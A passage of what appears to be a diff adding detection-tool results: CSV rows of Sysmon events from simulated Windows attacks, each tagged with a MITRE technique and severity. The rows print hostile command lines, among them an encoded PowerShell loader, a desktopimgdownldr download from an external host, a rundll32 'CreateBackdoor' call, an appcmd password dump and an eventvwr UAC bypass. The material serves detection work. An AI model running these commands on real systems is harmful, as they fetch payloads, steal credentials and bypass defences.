HkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 305352
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-07-03 08:47:20.001
+ 747F3D96-F098-5EFE-0000-001012E13801
+ 1932
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr
+ C:\Users\IEUser\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1CE4-5EFE-0000-0020CC9C0800
+ 0x89ccc
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-EF3D-5EFE-0000-0010F3653401
+ 5384
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 7649
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-15 07:13:42.577
+ 365ABB72-9AA6-5D04-0000-00109C850F00
+ 652
+ C:\Windows\System32\mshta.exe
+ IEWIN7\IEUser
+ tcp
+ true
+ false
+ 10.0.2.13
+ IEWIN7
+ 49159
+
+ false
+ 10.0.2.18
+
+ 4443
+
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8352
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-07-03 20:39:30.254
+ 365ABB72-1282-5D1D-0000-0010DD401B00
+ 2328
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-0A6F-5D1D-0000-0020CA350100
+ 0x135ca
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1256-5D1D-0000-0010FB1A1B00
+ 1632
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\system32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8352
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-07-03 20:39:30.254
+ 365ABB72-1282-5D1D-0000-0010DD401B00
+ 2328
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-0A6F-5D1D-0000-0020CA350100
+ 0x135ca
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1256-5D1D-0000-0010FB1A1B00
+ 1632
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\system32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8352
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-07-03 20:39:30.254
+ 365ABB72-1282-5D1D-0000-0010DD401B00
+ 2328
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-0A6F-5D1D-0000-0020CA350100
+ 0x135ca
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1256-5D1D-0000-0010FB1A1B00
+ 1632
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\system32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4917
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:28.222
+ 747F3D96-6628-5D3F-0000-001062788800
+ 2040
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5916
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.161
+ 365ABB72-3D6E-5CEB-0000-0010CC8AFF00
+ 2524
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243540
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.029
+ 747F3D96-9F69-5E75-0000-0010946B2000
+ 1828
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 16794
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 18:35:04.463
+ 365ABB72-6759-5CD8-0000-0010E2D50F00
+ 1420
+ C:\Windows\System32\regsvr32.exe
+ IEWIN7\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ IEWIN7..home
+ 49165
+
+ false
+ 104.20.208.21
+
+ 80
+ http
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243540
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.029
+ 747F3D96-9F69-5E75-0000-0010946B2000
+ 1828
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 7648
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-15 07:13:42.278
+ 365ABB72-9AA6-5D04-0000-00109C850F00
+ 652
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-98E4-5D04-0000-0020A4350100
+ 0x135a4
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-9972-5D04-0000-0010F0490C00
+ 3660
+ C:\Program Files\Internet Explorer\iexplore.exe
+ "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 417085
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 11:43:49.217
+ 747F3D96-D8F5-5F8A-0000-00106B6F7300
+ 1680
+ C:\Windows\SysWOW64\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll"
+ C:\Users\IEUser\AppData\Roaming\
+ MSEDGEWIN10\IEUser
+ 747F3D96-CA8D-5F8A-0000-0020D1090A00
+ 0xa09d1
+ 1
+ High
+ SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
+ 747F3D96-D8E5-5F8A-0000-0010E1BC7200
+ 2920
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4916
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:28.197
+ 747F3D96-6628-5D3F-0000-001067768800
+ 1296
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243540
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.029
+ 747F3D96-9F69-5E75-0000-0010946B2000
+ 1828
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" ) contain suspicious command ( \mshta.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 7648
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-15 07:13:42.278
+ 365ABB72-9AA6-5D04-0000-00109C850F00
+ 652
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-98E4-5D04-0000-0020A4350100
+ 0x135a4
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-9972-5D04-0000-0010F0490C00
+ 3660
+ C:\Program Files\Internet Explorer\iexplore.exe
+ "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 15
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1088,technique_name=Bypass User Account Control
+ 2019-04-18 16:57:04.500
+ 365ABB72-AC60-5CB8-0000-001037BA0800
+ 3900
+ C:\Windows\System32\mmc.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft Management Console
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-AB27-5CB8-0000-002021CA0000
+ 0xca21
+ 1
+ High
+ SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1
+ 365ABB72-AC60-5CB8-0000-001002B30800
+ 3904
+ C:\Windows\System32\eventvwr.exe
+ "C:\Windows\system32\eventvwr.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
